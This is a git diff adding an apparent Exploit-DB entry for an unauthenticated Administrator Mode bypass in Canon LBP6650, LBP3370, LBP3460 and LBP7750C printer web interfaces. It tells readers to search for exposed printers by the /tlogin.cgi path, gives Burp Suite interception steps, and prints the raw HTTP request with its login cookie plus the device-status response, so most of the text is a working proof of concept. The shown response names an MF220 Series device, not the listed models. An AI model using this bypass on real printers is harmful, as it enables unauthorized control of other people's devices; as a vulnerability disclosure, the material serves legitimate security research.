diff --git a/exploits/hardware/webapps/44844.txt b/exploits/hardware/webapps/44844.txt new file mode 100644 index 000000000..323724488 --- /dev/null +++ b/exploits/hardware/webapps/44844.txt @@ -0,0 +1,184 @@ +# Exploit Title: [ Incorrect Access Control in Canon LBP6650, LBP3370, LBP3460, LBP7750C] +# Date: [3.6.2018] +# Exploit Author: [Huy Kha] +# Vendor Homepage: [http://global.canon.com] +# Software Link: [ Website ] +# Severity: High +# Version: LBP6650, LBP3370, LBP3460, LBP7750C +# Tested on: Mozilla FireFox + +# Description : An issue was discovered on Canon LBP6650, LBP3370, LBP3460, LBP7750C printers. +It is possible for a remote (unauthenticated) attacker to bypass the Administrator Mode authentication without a password at any URL of the device that requires authentication. + + + +# PoC : +Start searching for Canon LBP6650 ,LBP3370, LBP3460 printers. +You can recognize them with the /tlogin.cgi parameter, but the version is +also been displayed on the webinterface. +https://imgur.com/a/QE3GfLw + +# Example : + +1. Go to the following url: http://127.0.0.1/tlogin.cgi +2. Click on Administrator Mode +3. Intercept now the request with Burpsuite and click on 'Ok'' to login. +And forward the request till you get the ''/frame.cgi?page=DevStatus'' +parameter. + + +# Request : + +GET /frame.cgi?page=DevStatus HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 +Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://127.0.0.1/tlogin.cgi +Cookie: CookieID=1610705327:; Login=11 +Connection: close +Upgrade-Insecure-Requests: 1 + +# Response : + +HTTP/1.1 200 OK +Date: MON, 05 JAN 1970 16:35:57 GMT +Server: CANON HTTP Server +Content-Type: text/html +Content-Length: 5652 + + + +
+ + + + + + + + + + + + +Device Name: | +MF220 Series | +
---|---|
Product Name: | +MF220 Series | +
Location: | ++ |
Printer: | +![]() |
+
---|---|
Scanner: | +![]() |
+
Fax: | +![]() |
+
No errors.
+ +Paper Source | +Paper Level | +Paper Size | +Paper Type | +
---|---|---|---|
Multi-Purpose Tray | +None | + +LTR | + +Plain (16 lb Bond-23 lb Bond) | +
Drawer 1 | +OK | + +LTR | + +Plain (16 lb Bond-23 lb Bond) | +
Color | +Level | +
---|---|
Black | +![]() |
+
Support Link: | + ++ + |
---|